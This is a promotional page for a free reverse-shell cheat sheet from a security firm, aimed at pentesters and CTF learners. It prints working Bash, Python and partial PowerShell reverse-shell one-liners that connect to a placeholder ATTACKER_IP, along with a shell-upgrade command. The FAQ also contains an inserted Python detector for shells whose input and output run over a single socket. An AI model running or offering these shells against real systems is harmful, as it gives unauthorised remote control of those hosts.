The Reverse Shell Reference Every Pentester Keeps Open
Bash. Python. PHP. PowerShell. Netcat. Ruby. NodeJS. Shell upgrades. One clean PDF — built by NaviSec practitioners from real engagements. Free download.
What's Inside the Reverse Shell Reference?
A PDF covering every major reverse shell technique — formatted for quick reference during live engagements, CTFs, or labs.
- Bash reverse shell - One-liner shells for Linux targets
- Python reverse shell - Cross-platform reverse shell payloads
- PHP Variants - Three distinct PHP techniques
- NodeJS - JavaScript-based reverse shell
- PowerShell - Windows shells -- standard + base64 + binary exec
- Netcat & OpenSSL - nc traditional + encrypted OpenSSL variant
- Ruby & Perl - Scripting language shells
Every technique is tested. Copy-paste ready. No filler.
See What You're Getting
Here’s a sample from the pentester cheat sheet reference: the kind of clean, copy-paste ready syntax you’ll get across 12 techniques in the full PDF.
Bash TCP
bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1
Python 3
python3 -c 'import socket,subprocess,os; s=socket.socket(); s.connect(("ATTACKER_IP",4444)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); subprocess.call(["/bin/sh","-i"])'
PowerShell
$c=New-Object System.Net.Sockets.TCPClient("ATTACKER_IP",4444);...
The full PDF includes 12+ techniques with syntax-highlighted code blocks, shell upgrade instructions, and usage notes.
Who it's for
Penetration Testers
Keep the reference open during engagements when you need a working shell fast, without breaking workflow to Google.
Security Students & CTF
Learning reverse shells for OSCP, HTB, THM or security certifications.
Red Team Operators
Covers Windows (PowerShell, binary exec) and Linux targets. The shell upgrade section handles interactive sessions post-exploitation.
Built by Penetration Testers for Penetration Testers
NaviSec is a Tampa-based offensive and defensive cyber security firm. Our engineers run penetration tests for Internal, External, Web Applications, IoT/Hardware devices, Physical security penetration testing, Red Team, Purple Team and more. NaviSec provides defensive services such as SOC/SIEM, Managed Detection and Response (MDR), and secure infrastructure design utilizing Fortinet and Cato Networks. We operate in nearly every industry including government, healthcare, finance, and manufacturing. We have pen tested jails, pasta factories and everything in between!
We have used this cheat sheet internally for many years and are releasing it now to the community. We will be releasing more content soon and will be better organizing our blogs. Stay tuned!
Frequently Asked Questions
Q: What is a reverse shell?
A reverse shell is a technique used in penetration testing where a target machine initiates a connection back to the attacker’s machine, giving the attacker remote command execution. Unlike a bind shell, the target reaches out — making it effective for bypassing inbound firewall rules on the target.
Q: What’s the difference between a reverse shell and a bind shell?
A bind shell opens a port on the target and waits for the attacker to connect. A reverse shell has the target connect back to the attacker. In external penetration testing, reverse shells are more reliable because outbound traffic is usually less restricted than inbound on target networks.
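Seen from the target host, the Bash and Python samples on this page both end in a shell whose stdin, stdout and stderr are one and the same network socket, and that is something a defender can check for in /proc on Linux. The following is an added example, not part of NaviSec's reference; the function names, the SHELLS list and the sample rows are assumptions constructed for illustration.

```python
import os
import re

# Assumption: interpreter names worth watching; extend for your environment.
SHELLS = {"sh", "bash", "dash", "zsh", "ksh"}
SOCKET_LINK = re.compile(r"^socket:\[(\d+)\]$")

def stdio_socket_inode(fd_links):
    """Return the inode when fds 0, 1 and 2 all point at one socket, else None."""
    inodes = set()
    for fd in (0, 1, 2):
        match = SOCKET_LINK.match(fd_links.get(fd, ""))
        if match is None:
            return None
        inodes.add(match.group(1))
    return inodes.pop() if len(inodes) == 1 else None

def is_suspicious(comm, fd_links):
    """A shell whose whole stdio is a single socket has no terminal, pipe or file behind it."""
    return comm in SHELLS and stdio_socket_inode(fd_links) is not None

def scan_host(proc="/proc"):
    """Walk a live Linux /proc and return (pid, comm, inode) for each hit."""
    hits = []
    for entry in filter(str.isdigit, os.listdir(proc)):
        try:
            with open(f"{proc}/{entry}/comm") as handle:
                comm = handle.read().strip()
            links = {fd: os.readlink(f"{proc}/{entry}/fd/{fd}") for fd in (0, 1, 2)}
        except OSError:
            continue  # process exited, fd closed, or not readable by this user
        if is_suspicious(comm, links):
            hits.append((int(entry), comm, stdio_socket_inode(links)))
    return hits

# Constructed samples: (comm, {fd: readlink target}) as /proc would report them.
SAMPLES = {
    "login shell on a terminal": ("bash", {0: "/dev/pts/0", 1: "/dev/pts/0", 2: "/dev/pts/0"}),
    "shell with stdio on one socket": ("sh", {0: "socket:[48213]", 1: "socket:[48213]", 2: "socket:[48213]"}),
    "shell with split sockets": ("bash", {0: "socket:[5100]", 1: "socket:[5100]", 2: "socket:[5102]"}),
    "daemon logging to a socket": ("nginx", {0: "/dev/null", 1: "/dev/null", 2: "socket:[30011]"}),
}

def classify_samples():
    return {name: is_suspicious(comm, links) for name, (comm, links) in SAMPLES.items()}

if __name__ == "__main__":
    for name, flagged in classify_samples().items():
        print(f"{'ALERT' if flagged else 'ok   '}  {name}")
    print("live hits:", scan_host() if os.path.isdir("/proc") else "n/a")
```

The check does not tell a TCP socket from a Unix-domain one, so look the reported inode up in /proc/net/tcp before raising an alert.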
Q: Which reverse shell technique should I use?
It depends on what’s available on the target. Bash TCP is the go-to for Linux. PowerShell or the binary exec method works well on Windows. Python 3 is a reliable cross-platform fallback when scripting runtimes are available. The reference covers all major options so you can try alternatives quickly.
Q: How do I upgrade a reverse shell to a full TTY?
After catching a basic shell, you can upgrade it using the Python PTY method: python3 -c 'import pty; pty.spawn("/bin/bash")' — then background it, run "stty raw -echo; fg", and set the terminal size. The full instructions are in the PDF.
Q: Is this reference free?
Yes. Enter your email above and we’ll send it directly to your inbox. No credit card, no catch. You’ll also receive occasional emails from NaviSec about new resources and guides — unsubscribe any time.
Q: Does NaviSec offer penetration testing services?
Yes. NaviSec provides Black Box and White Box penetration testing, Red Team engagements, and CMMC compliance operations. Visit navisec.io/services or contact us at sales@navisec.io to discuss an engagement.